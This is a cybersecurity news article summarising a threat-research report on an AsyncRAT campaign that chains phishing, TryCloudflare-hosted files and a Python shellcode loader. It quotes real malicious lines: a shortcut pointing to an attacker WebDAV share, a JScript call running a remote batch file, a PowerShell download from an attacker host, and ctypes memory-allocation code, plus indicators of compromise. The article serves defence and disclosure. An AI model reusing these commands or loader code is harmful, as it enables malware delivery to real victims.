AsyncRAT Abusing Python and TryCloudflare For Stealthy Malware Delivery
A recent cybersecurity threat has emerged in the form of AsyncRAT, a remote access trojan (RAT) that leverages Python and TryCloudflare for stealthy malware delivery. This sophisticated campaign involves a complex sequence of events, starting with phishing emails that deceive users into downloading malicious payloads. Here the attack chain exploits legitimate infrastructure which makes the […] The post AsyncRAT Abusing Python and TryCloudflare For Stealthy Malware Delivery appeared first on Cyber Security News.
![AsyncRAT Abusing Python and TryCloudflare For Stealthy Malware Delivery](https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKjTGMZ4TLWvHzYv3ufN_GrIj62ueM_OQyaIEahtyait7VOJ_eS9lxWk88bUTF8kIECuTQ5VuhXDPzUVje8d0myZ1eL2rnoItni2ZmepR5v2erYRY-DMcRFarNqjXhPZNNftujhLzxnYJfsA6cnQ5Styv4w3X2k9_gDYgWhRSlEhNsZePcY0kSOKY6ghY/s16000/AsyncRAT Abusing Python and TryCloudflare For Stealthy Malware Delivery.webp?#)
A recent cybersecurity threat has emerged in the form of AsyncRAT, a remote access trojan (RAT) that leverages Python and TryCloudflare for stealthy malware delivery.
This sophisticated campaign involves a complex sequence of events, starting with phishing emails that deceive users into downloading malicious payloads.
Here the attack chain exploits legitimate infrastructure which makes the detection challenging and pose significant risks to organizations.
The Forcepoint X-Labs research team has detailed this evolving threat, and experts noted that to remain undetected threat actors exploited legitimate infrastructure.
Phishing Email and Initial Payload
The attack begins with a phishing email containing a Dropbox URL. When clicked, this link downloads a ZIP file, which includes an internet shortcut file (.URL format).
Opening this file initiates a series of background downloads while displaying a legitimate-looking PDF to distract the user.
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3Lw63na8Nm8ag73mFxzBy3eaoo3QkKwJ9kJmtDm6BO6nTrI5BlVo2gRtooYP0FWiNHzNMClpHfkibhFVVRUeavIMkGz8sXgE6R8clqjA9yCPNSBUkhVvaI9i1ON8wgKX24COBdRRbMIqhWvhEnHfIJKunPe9jSbhXV7_81WfcVrHVOznZv3_O3kILH5g/s16000/AsyncRAT%20Attack%20Chain%20(Source%20-%20ForcePoint).webp)
Stage 1: .URL Analysis
The .URL file contains a TryCloudflare URL, which directs to a directory hosting an .LNK file.
[InternetShortcut]
IDList=
HotKey=0
URL=file://inventory-card-thumbzilla-ip.trycloudflare.com@SSL/DavWWWRoot/DE [{000214A0-0000-0000-C000-000000000046}]
Prop3=19,9
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwY3ClmXAb7IsvE1GrgvL-A6PwV0DKWksgE57_stV1QigzoQ6hgh14APXFGL7-vWXRFewlhob7V23J10aBWjJuaKIkUCs2DnsmPZd8Ip5y4_Zh7I2r5tld_x8vPjSjZciyl2qP2tf6gBbENT7BYWXnXbAfhNTum1YwcOoqffGMsg1UvLPaI5nhJt-k12I/s16000/Internet%20Shortcut%20File%20(Source%20-%20ForcePoint).webp)
This link leads to a directory with an .LNK file named “RE-002.pdf.1nk.”
Stage 2: .LNK Analysis
Clicking the .LNK file triggers PowerShell to download a JavaScript file from the same TryCloudflare tunnel.
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgW-P_xKt6qBzbOgeKLIAWTR6Q3LPj4kYSKAdPh7le9MlyoZOs_s36_6A67BkvdLQIN__aJEqkQNaxHSLbjWxE8tqvsW9dVu5NyAAsKqSBvoDPckuZYu_qsEj73Ap8Sx7zUxuRCPEgK6I5Jz9dLDRndGKyJsvNqcmLc_ukd5tL1NwfN982mk8Q1lSCDPos/s16000/.LNK%20File%20with%20Path%20to%20JavaScript%20File%20(Source%20-%20ForcePoint).webp)
Stage 3: .JS Analysis
The JavaScript file downloads a .BAT file from the same TryCloudflare site.
var objShell = new ActiveXObject("WScript.Shell");
objShell.Run("cmd.exe /c \\\\inventory-card-thumbzilla-ip.trycloudflare.com@SSL\\DavWWWRoot\\cq.bat", 0, false);
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheP9qWqutLwOjZN1qTGfn18PvYfdLAmhaL7Lc6TL42VAreKyAFqG4UhRdHL7YZ_sfXnxMCoz-2ty2qZnLvY26qfhW8ereaGemSkUCol0gl8hNCRv6IlzhYwePk-wzx6CQfbab8F7zqk95mYhSNavdYY9kEgRO7N4NubYpZnvtO6mUhGvIa8tjHUltC3nw/s16000/Deobfuscated%20JS%20File%20with%20Link%20to%20.BAT%20File%20(Source%20-%20ForcePoint).webp)
Stage 4: .BAT Analysis
The .BAT file uses PowerShell to download a ZIP file containing a Python package. It extracts the ZIP, checks for Python, and runs the Python scripts.
powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://mercy-synopsis-notify-motels.trycloudflare.com/ma.zip' -outFile 'ma.zip' } catch { exit 1 }"
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeH007kb7WL_aJAM_90cgoUYgP0FV8rZ_NwX-90wuetdSOM2mvckA7ykqa2VARSR-mULxJqm6GCTgQCNTQ7V42PK5o8MLnao5WcX76iKwRY-a_Fh0txYbHgtxf33-vG4u7Nc7gontpAmMSVhnIAyH0Q7NcLizNXuWPGNG45mw0HSD0l2hdwws82Swof_U/s16000/Deobfuscated%20.BAT%20File%20(Source%20-%20ForcePoint).webp)
Stage 5: .PY Analysis
The Python package includes a load.py
file that executes malicious .BIN files. It uses the ctypes library to interact with Windows APIs.
# Example of using ctypes for memory allocation and thread creation
import ctypes
kk = ctypes.windll.kernel32
kk.VirtualAlloc.argtypes = [ctypes.c_void_p, ctypes.c_size_t, ctypes.c_ulong, ctypes.c_ulong]
kk.CreateThread.argtypes = [ctypes.c_void_p, ctypes.c_size_t, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_ulong, ctypes.c_void_p]
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiv-WjF986t5WokO4ZkTgoFyfKHBuyF4O1UHVtVXMxcwraNQPhJODE8B7IUHjJAbghDYUuh5WeDYvZjTPJGI3u17Q7uEoZ1FASlJerydTU1o5Jokae3zQPcSPeS_I1yJsva9s0PuCP1sSc3gH_HnfEvHRQ6sjrrJOge96K12H9O75GegA1DEBgO03ouORE/s16000/Actual%20Malicious%20Files%20(Source%20-%20ForcePoint).webp)
By using multi-stage obfuscation and legitimate-looking distractions, the attackers evade detection while deploying AsyncRAT and other malware.
Organizations must remain vigilant and adopt robust security measures to detect and block such threats at various stages of the attack chain.
Indicators of Compromise (IOCs)
- Malicious URLs:
hxxps[:]//inventory-card-thumbzilla-ip[.]trycloudflare[.]com/DE/
hxxps[:]//mercy-synopsis-notify-motels[.]trycloudflare[.]com/ma[.]zip
- C2 Servers:
62.60.190.141:3232
- Hashes:
- ZIP File:
55724b766dd1fe8bf9dd4cb7094b83b88d57d945
Are you from SOC/DFIR Teams? – Analyse Malware Files & Links with ANY.RUN Sandox -> Start Now for Free.
The post AsyncRAT Abusing Python and TryCloudflare For Stealthy Malware Delivery appeared first on Cyber Security News.